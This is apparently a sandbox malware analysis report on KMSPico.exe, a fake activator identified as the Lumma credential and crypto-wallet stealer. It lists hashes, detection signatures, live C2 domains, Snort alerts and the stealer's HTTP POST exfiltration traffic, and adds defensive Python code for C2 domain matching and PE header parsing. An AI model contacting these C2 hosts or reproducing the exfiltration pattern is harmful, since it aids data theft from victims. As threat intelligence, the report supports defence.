
Windows Analysis Report
KMSPico.exe

Overview

General Information

Sample name: KMSPico.exe
Analysis ID: 1400640
MD5: e46fcde17771922059b7a826ec4e4ca3
SHA1: c7ade612e6053c7652698d431f59c7ed43a57f19
SHA256: e2e733137df2e1a7d726335f8ae4d1b4ce83ef2d1d3db2651c23db1a24c918f0
Tags: exe

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w10x64
  • KMSPico.exe (PID: 3648, cmdline: C:\Users\user\Desktop\KMSPico.exe, MD5: E46FCDE17771922059B7A826EC4E4CA3)
    • WerFault.exe (PID: 5276, cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3648 -s 1644, MD5: C31336C1EFC2CCB44B4326EA793040F2)

Malware family

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware configuration (LummaC)
{
  "C2 url": [
    "associationokeo.shop",
    "turkeyunlikelyofw.shop",
    "pooreveningfuseor.pw",
    "detectordiscusser.shop",
    "problemregardybuiwo.fun",
    "technologyenterdo.shop"
  ]
}
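The six domains in this configuration block are what the two DNS Snort alerts (SIDs 2050955 and 2050998) and the TLS SNI alert (SID 2051001) listed further down key on. The following is an added example, not part of the report and not Joe Sandbox code: it turns the extracted list into a matcher that tolerates defanged spellings such as "problemregardybuiwo .fun" (the form the Snort rule names use) and also matches subdomains, and runs it over constructed tab-separated DNS-query and TLS-SNI records that mirror the sandbox's flows. The record layout, the connection uids and the www.example.com / notassociationokeo.shop entries are assumptions for the demo.

```python
"""Match the C2 domains from the extracted LummaC configuration against DNS
query names and TLS SNI values. Added example: the C2 list is the one from the
report's configuration block; the log records are constructed, not captured."""

# C2 domains exactly as the configuration extractor reported them.
C2_DOMAINS = [
    "associationokeo.shop",
    "turkeyunlikelyofw.shop",
    "pooreveningfuseor.pw",
    "detectordiscusser.shop",
    "problemregardybuiwo.fun",
    "technologyenterdo.shop",
]


def normalise(name: str) -> str:
    """Undo common defanging ("x[.]shop", "x .shop", "x(.)shop", "x[dot]shop"),
    drop a trailing dot and lower-case, so IOCs pasted from reports compare cleanly."""
    for token in ("[.]", "(.)", " .", "[dot]"):
        name = name.replace(token, ".")
    return name.strip().rstrip(".").lower()


C2_SET = {normalise(d) for d in C2_DOMAINS}


def matched_c2(name: str):
    """Return the C2 domain that `name` equals or is a subdomain of, else None.
    A suffix match without the leading dot (notassociationokeo.shop) is NOT a hit."""
    name = normalise(name)
    for c2 in C2_SET:
        if name == c2 or name.endswith("." + c2):
            return c2
    return None


# Constructed records (assumed layout): ts, uid, src, src_port, dst, dst_port, kind, name.
# `kind` is "dns" for a DNS query name and "sni" for a TLS server_name.
SAMPLE_LOG = """\
1709171273.047\tCx1\t192.168.2.5\t58632\t1.1.1.1\t53\tdns\tproblemregardybuiwo.fun
1709171273.145\tCx2\t192.168.2.5\t64821\t1.1.1.1\t53\tdns\ttechnologyenterdo.shop
1709171273.254\tCx3\t192.168.2.5\t49704\t104.21.80.118\t443\tsni\ttechnologyenterdo.shop
1709171274.000\tCx4\t192.168.2.5\t49720\t93.184.216.34\t443\tsni\twww.example.com
1709171275.000\tCx5\t192.168.2.5\t49721\t104.21.80.118\t443\tsni\tcdn.associationokeo.shop
1709171276.000\tCx6\t192.168.2.5\t49722\t203.0.113.9\t443\tsni\tnotassociationokeo.shop
"""


def scan(log_text: str):
    """Return (uid, kind, name, c2) for every record whose name matches a C2 domain."""
    hits = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split("\t")
        if len(fields) != 8:
            continue  # malformed record: skip it rather than abort the whole scan
        uid, kind, name = fields[1], fields[6], fields[7]
        c2 = matched_c2(name)
        if c2:
            hits.append((uid, kind, name, c2))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("C2 contact: uid=%s %s=%s (matches %s)" % hit)
```

Both the DNS lookup and the later TLS connection are checked because the sandbox saw the sample query technologyenterdo.shop and then connect to a Cloudflare address with that name in the SNI; on a host that resolves through an encrypted resolver only the SNI side is visible.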
Yara matches (source, rule, description, author, strings)

Source: sslproxydump.pcap | Rule: JoeSecurity_LummaCStealer_3 | Description: Yara detected LummaC Stealer | Author: Joe Security
Source: sslproxydump.pcap | Rule: JoeSecurity_LummaCStealer_2 | Description: Yara detected LummaC Stealer | Author: Joe Security
Source: 00000000.00000002.2258987153.000000000252F000.00000040.00000020.00020000.00000000.sdmp | Rule: Windows_Trojan_RedLineStealer_ed346e4c | Description: unknown | Author: unknown
  • 0xe18:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Source: 00000000.00000002.2258808314.00000000024A0000.00000040.00001000.00020000.00000000.sdmp | Rule: Windows_Trojan_Smokeloader_3687686f | Description: unknown | Author: unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Source: 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: Process Memory Space: KMSPico.exe PID: 3648 | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: Process Memory Space: KMSPico.exe PID: 3648 | Rule: JoeSecurity_LummaCStealer | Description: Yara detected LummaC Stealer | Author: Joe Security

No Sigma rule has matched

Snort IDS alerts (timestamp, SID, source port, destination port, protocol, classtype)

02/29/24-01:47:53.832376  2051001  49705  443  TCP  A Network Trojan was detected
02/29/24-01:48:00.206830  2051001  49710  443  TCP  A Network Trojan was detected
02/29/24-01:47:59.419425  2051001  49709  443  TCP  A Network Trojan was detected
02/29/24-01:47:53.145475  2050998  64821  53   UDP  A Network Trojan was detected
02/29/24-01:48:01.392463  2051001  49711  443  TCP  A Network Trojan was detected
02/29/24-01:47:53.047409  2050955  58632  53   UDP  A Network Trojan was detected
02/29/24-01:47:53.254875  2051001  49704  443  TCP  A Network Trojan was detected
02/29/24-01:47:55.834473  2051001  49707  443  TCP  A Network Trojan was detected
02/29/24-01:47:56.787043  2051001  49708  443  TCP  A Network Trojan was detected
02/29/24-01:47:54.800926  2051001  49706  443  TCP  A Network Trojan was detected


AV Detection

Source: KMSPico.exe | Avira: detected
Source: problemregardybuiwo.fun | Avira URL Cloud: Label: malware
Source: associationokeo.shop | Avira URL Cloud: Label: malware
Source: turkeyunlikelyofw.shop | Avira URL Cloud: Label: malware
Source: https://technologyenterdo.shop/api | Avira URL Cloud: Label: malware
Source: KMSPico.exe.3648.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "detectordiscusser.shop", "problemregardybuiwo.fun", "technologyenterdo.shop"]}
Source: technologyenterdo.shop | Virustotal: Detection: 16%
Source: problemregardybuiwo.fun | Virustotal: Detection: 17%
Source: pooreveningfuseor.pw | Virustotal: Detection: 14%
Source: turkeyunlikelyofw.shop | Virustotal: Detection: 19%
Source: associationokeo.shop | Virustotal: Detection: 19%
Source: detectordiscusser.shop | Virustotal: Detection: 18%
Source: https://technologyenterdo.shop/ | Virustotal: Detection: 15%
Source: https://technologyenterdo.shop/y | Virustotal: Detection: 15%
Source: https://technologyenterdo.shop/api | Virustotal: Detection: 18%
Source: https://technologyenterdo.shop/apis | Virustotal: Detection: 14%
Source: KMSPico.exe | ReversingLabs: Detection: 36%
Source: KMSPico.exe | Virustotal: Detection: 45%
Source: KMSPico.exe | Joe Sandbox ML: detected

Compliance

Source: C:\Users\user\Desktop\KMSPico.exe | Unpacked PE file: 0.2.KMSPico.exe.400000.0.unpack
Source: KMSPico.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\KMSPico.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.80.118:443 -> 192.168.2.5:49711 version: TLS 1.2
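The "Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE" line is the decoded IMAGE_FILE_HEADER.Characteristics bitfield of the submitted file, while the two "Detected unpacking" signatures in the list at the top come from watching the process change section protections and rewrite its own PE header at run time. The following is an added example, not the sample and not Joe Sandbox code: it builds a minimal PE32 image in memory, decodes those file characteristics, and lists sections that are already writable and executable on disk, which is the static counterpart of the runtime behaviour the sandbox flagged. The section names, the 0x40 e_lfanew value and the zeroed optional header are constructed for the demo; parse_pe_file() runs the same decoder on a real file.

```python
"""Decode IMAGE_FILE_HEADER and section Characteristics from a PE image.
Added example with a constructed minimal PE32 image; the struct layouts and
flag values are those of the PE/COFF specification."""
import struct

# IMAGE_FILE_HEADER.Characteristics bits used here (PE/COFF spec).
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}
# IMAGE_SECTION_HEADER.Characteristics memory-permission bits.
SCN_MEM_EXECUTE = 0x20000000
SCN_MEM_READ = 0x40000000
SCN_MEM_WRITE = 0x80000000

IMAGE_FILE_MACHINE_I386 = 0x014C
PE_SIGNATURE_OFFSET = 0x40      # assumed e_lfanew for the constructed image
OPTIONAL_HEADER_SIZE = 224      # size of a PE32 optional header
FILE_HEADER_FMT = "<HHIIIHH"    # Machine, NumberOfSections, TimeDateStamp, PtrSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
SECTION_FMT = "<8sIIIIIIHHI"    # Name, VirtualSize, VirtualAddress, SizeOfRawData, PtrRawData, PtrRelocs, PtrLines, NumRelocs, NumLines, Characteristics


def build_pe(file_characteristics, sections):
    """Construct a minimal PE32 image: DOS header, "PE\\0\\0", file header,
    a zeroed PE32 optional header and one section header per (name, flags)."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, PE_SIGNATURE_OFFSET)          # e_lfanew
    file_header = struct.pack(FILE_HEADER_FMT, IMAGE_FILE_MACHINE_I386,
                              len(sections), 0, 0, 0, OPTIONAL_HEADER_SIZE,
                              file_characteristics)
    optional = bytearray(OPTIONAL_HEADER_SIZE)
    struct.pack_into("<H", optional, 0, 0x10B)                       # PE32 magic
    table = b"".join(
        struct.pack(SECTION_FMT, name.encode().ljust(8, b"\0"),
                    0x1000, 0x1000 * (i + 1), 0x200, 0x400 * (i + 1),
                    0, 0, 0, 0, flags)
        for i, (name, flags) in enumerate(sections))
    return bytes(dos) + b"PE\0\0" + file_header + bytes(optional) + table


def parse_pe(data):
    """Return machine, decoded file characteristics, (name, flags) per section,
    and the names of sections that are both writable and executable."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    fh = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from(FILE_HEADER_FMT, data, fh)
    flags = [name for bit, name in sorted(FILE_CHARACTERISTICS.items()) if chars & bit]
    sec_off = fh + struct.calcsize(FILE_HEADER_FMT) + opt_size
    sections = []
    for i in range(nsections):
        raw = struct.unpack_from(SECTION_FMT, data, sec_off + struct.calcsize(SECTION_FMT) * i)
        sections.append((raw[0].rstrip(b"\0").decode(errors="replace"), raw[9]))
    rwx = [n for n, f in sections if f & SCN_MEM_WRITE and f & SCN_MEM_EXECUTE]
    return {"machine": machine, "characteristics": flags,
            "sections": sections, "rwx_sections": rwx}


def parse_pe_file(path):
    """Decode a PE file from disk with the same routine."""
    with open(path, "rb") as fh:
        return parse_pe(fh.read())


if __name__ == "__main__":
    # 0x0103 = RELOCS_STRIPPED | EXECUTABLE_IMAGE | 32BIT_MACHINE, as in the report.
    demo = build_pe(0x0103, [(".text", SCN_MEM_READ | SCN_MEM_EXECUTE),
                             (".data", SCN_MEM_READ | SCN_MEM_WRITE),
                             (".stub", SCN_MEM_READ | SCN_MEM_WRITE | SCN_MEM_EXECUTE)])
    print(parse_pe(demo))
```

A stripped relocation table on a 32-bit EXE is unremarkable on its own; it is the combination with a writable-and-executable section, or with protections changed after load as the sandbox observed, that is worth a second look.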

Networking

Source: Traffic | Snort IDS: 2050955 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (problemregardybuiwo .fun) 192.168.2.5:58632 -> 1.1.1.1:53
Source: Traffic | Snort IDS: 2050998 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (technologyenterdo .shop) 192.168.2.5:64821 -> 1.1.1.1:53
Source: Traffic | Snort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49704 -> 104.21.80.118:443
Source: Traffic | Snort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49705 -> 104.21.80.118:443
Source: Traffic | Snort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49706 -> 104.21.80.118:443
Source: Traffic | Snort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49707 -> 104.21.80.118:443
Source: Traffic | Snort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49708 -> 104.21.80.118:443
Source: Traffic | Snort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49709 -> 104.21.80.118:443
Source: Traffic | Snort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49710 -> 104.21.80.118:443
Source: Traffic | Snort IDS: 2051001 ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI) 192.168.2.5:49711 -> 104.21.80.118:443
Source: Malware configuration extractor | URLs: associationokeo.shop
Source: Malware configuration extractor | URLs: turkeyunlikelyofw.shop
Source: Malware configuration extractor | URLs: pooreveningfuseor.pw
Source: Malware configuration extractor | URLs: detectordiscusser.shop
Source: Malware configuration extractor | URLs: problemregardybuiwo.fun
Source: Malware configuration extractor | URLs: technologyenterdo.shop
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: technologyenterdo.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 52 | Host: technologyenterdo.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 13678 | Host: technologyenterdo.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 16221 | Host: technologyenterdo.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20565 | Host: technologyenterdo.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 7086 | Host: technologyenterdo.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1256 | Host: technologyenterdo.shop
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 591913 | Host: technologyenterdo.shop
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: problemregardybuiwo.fun
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: technologyenterdo.shop
Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net
Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: KMSPico.exe, 00000000.00000003.2054785992.0000000004B23000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2036088652.0000000004B36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2036088652.0000000004B36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2036088652.0000000004B36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: KMSPico.exe, 00000000.00000003.2120848837.0000000002586000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259172539.00000000025EC000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2063814248.0000000002602000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2053752009.0000000002601000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2089735243.0000000002601000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://technologyenterdo.shop/
Source: KMSPico.exe, 00000000.00000003.2066524885.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2063814248.0000000002602000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://technologyenterdo.shop/&
Source: KMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://technologyenterdo.shop/1
Source: KMSPico.exe, 00000000.00000003.2053752009.0000000002601000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2089735243.0000000002601000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://technologyenterdo.shop/?
Source: KMSPico.exe, 00000000.00000003.2121001865.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259172539.00000000025EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://technologyenterdo.shop/J
Source: KMSPico.exe, 00000000.00000003.2121026380.00000000025F8000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2063814248.0000000002602000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2054906395.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2053752009.0000000002601000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2089735243.0000000002601000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://technologyenterdo.shop/api
Source: KMSPico.exe, 00000000.00000003.2034989504.0000000002593000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://technologyenterdo.shop/apie
Source: KMSPico.exe, 00000000.00000003.2090458724.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2082443424.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2066524885.0000000002604000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2063814248.0000000002602000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2089735243.0000000002601000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://technologyenterdo.shop/apik4
Source: KMSPico.exe, 00000000.00000003.2121121404.0000000002606000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2121001865.00000000025EA000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2120848837.0000000002593000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000002.2259320177.0000000002607000.00000004.00000020.00020000.00000000.sdmp, KMSPico.exe, 00000000.00000003.2121026380.00000000025F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://technologyenterdo.shop/apis
Source: KMSPico.exe, 00000000.00000003.2120848837.0000000002586000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://technologyenterdo.shop/y
Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: KMSPico.exe, 00000000.00000003.2036010212.0000000004B39000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: KMSPico.exe, 00000000.00000003.2056127239.0000000004D2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
